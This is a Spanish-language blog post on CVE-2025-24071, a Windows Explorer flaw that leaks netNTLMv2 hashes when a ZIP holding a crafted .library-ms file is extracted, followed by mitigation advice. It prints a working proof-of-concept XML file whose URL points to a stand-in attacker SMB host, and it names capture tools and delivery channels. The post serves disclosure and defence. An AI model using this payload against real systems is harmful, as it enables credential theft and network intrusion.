CVE-2025-24071 - Filtrar Credenciales netNTLMv2 con un simple ZIP

En esta entrada del blog, se presenta una prueba de concepto (PoC) que demuestra cómo un archivo .library-ms malicioso puede ser utilizado para capturar credenciales en formato netNTLMv2 sin necesidad de que la víctima interactúe con el archivo. Basta con descomprimir el archivo para que se active la vulnerabilidad.

Descripción de la Vulnerabilidad

La vulnerabilidad CVE-2025-24071 es un fallo crítico en Windows Explorer, el administrador de archivos predeterminado del sistema operativo Windows. Este exploit aprovecha un comportamiento inseguro en el procesamiento de archivos comprimidos (ZIP) que contienen un archivo de biblioteca de Windows con extensión .library-ms. Cuando un usuario descomprime un archivo ZIP malicioso, Windows Explorer procesa automáticamente el archivo .library-ms incrustado, lo que desencadena una conexión SMB (Server Message Block) a un servidor remoto controlado por un atacante.

Lo más peligroso de esta vulnerabilidad es que no requiere interacción explícita del usuario (como hacer clic en el archivo), ya que la acción maliciosa se ejecuta en segundo plano durante la descompresión. Como resultado, el sistema de la víctima envía las credenciales de autenticación en formato netNTLMv2 al atacante, lo que podría permitirle realizar un ataque de relay de autenticación (NTLM Relay) o intentar descifrar las credenciales mediante técnicas de fuerza bruta.

Impacto potencial:

  • Robo de credenciales: Un atacante podría capturar hashes NTLMv2 y, en entornos con políticas de contraseñas débiles, descifrarlas offline.

  • Movimiento lateral en redes corporativas: Si el usuario afectado tiene privilegios en una red interna, el atacante podría escalar el acceso.

  • Ejecución remota de código (RCE): En combinación con otras vulnerabilidades, podría lograrse RCE.

Prueba de Concepto (PoC)

1. Preparación del Archivo Malicioso

Para explotar esta vulnerabilidad, primero debemos crear un archivo .library-ms con el siguiente contenido XML malicioso:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
    <searchConnectorDescriptionList>
        <searchConnectorDescription>
            <simpleLocation>
                <url>\\ATTACKER-IP\shared</url>
            </simpleLocation>
        </searchConnectorDescription>
    </searchConnectorDescriptionList>
</libraryDescription>

Este archivo XML contiene una referencia a un recurso SMB remoto (\\ATTACKER-IP\shared) que el sistema intentará contactar automáticamente cuando el archivo sea procesado por Windows Explorer. Posteriormente, comprimimos este archivo en formato ZIP para su distribución.

Creación del archivo malicioso

2. Distribución y Explotación Silenciosa

El vector de ataque es sorprendentemente simple: el atacante distribuye el archivo ZIP a la víctima a través de cualquier medio (correo electrónico, mensajería, sitios de descarga, etc.). Lo crítico de esta vulnerabilidad es que no requiere que el usuario abra el archivo malicioso. Simplemente al descomprimir el ZIP, Windows Explorer procesa automáticamente el archivo .library-ms contenido, intentando establecer una conexión SMB al servidor controlado por el atacante.

Proceso de descompresión del ZIP malicioso

3. Captura de Credenciales

En el servidor del atacante, se configura un listener SMB utilizando herramientas como responder, ntlmrelayx o Inveigh para interceptar y registrar los hashes netNTLMv2 enviados por el sistema de la víctima durante el intento de autenticación. Estos hashes pueden posteriormente ser:

  • Sometidos a ataques de fuerza bruta para recuperar la contraseña en texto claro
  • Utilizados en ataques de retransmisión NTLM (NTLM Relay) para escalar privilegios o moverse lateralmente en la red
  • Aprovechados para establecer sesiones autenticadas en sistemas que acepten este tipo de autenticación

Captura exitosa de credenciales netNTLMv2

Mitigación

Para proteger los sistemas contra la vulnerabilidad CVE-2025-24071, se recomiendan las siguientes medidas:

  1. Instalar actualizaciones de seguridad: Aplicar inmediatamente los parches de seguridad publicados por Microsoft para esta vulnerabilidad específica.

  2. Configurar políticas de grupo:

    • Deshabilitar SMB outbound en entornos corporativos cuando sea posible
    • Implementar reglas de firewall que bloqueen conexiones SMB salientes no autorizadas
  3. Buenas prácticas de seguridad:

    • Evitar descomprimir archivos ZIP de fuentes no confiables
    • Utilizar soluciones antivirus actualizadas que puedan detectar este tipo de amenazas
    • Considerar el uso de entornos aislados para examinar archivos sospechosos
  4. Monitorización de red: Implementar sistemas de detección de intrusiones capaces de identificar intentos de explotación de esta vulnerabilidad.

Microsoft ha clasificado esta vulnerabilidad como crítica y recomienda actualizar todos los sistemas afectados con prioridad alta.

Conclusión

La vulnerabilidad CVE-2025-24071 destaca la importancia de mantener los sistemas actualizados y ser cauteloso al manejar archivos comprimidos de fuentes desconocidas. La explotación de esta vulnerabilidad puede ocurrir sin que el usuario interactue directamente con el exploit lo que la hace especialmente peligrosa.

Referencias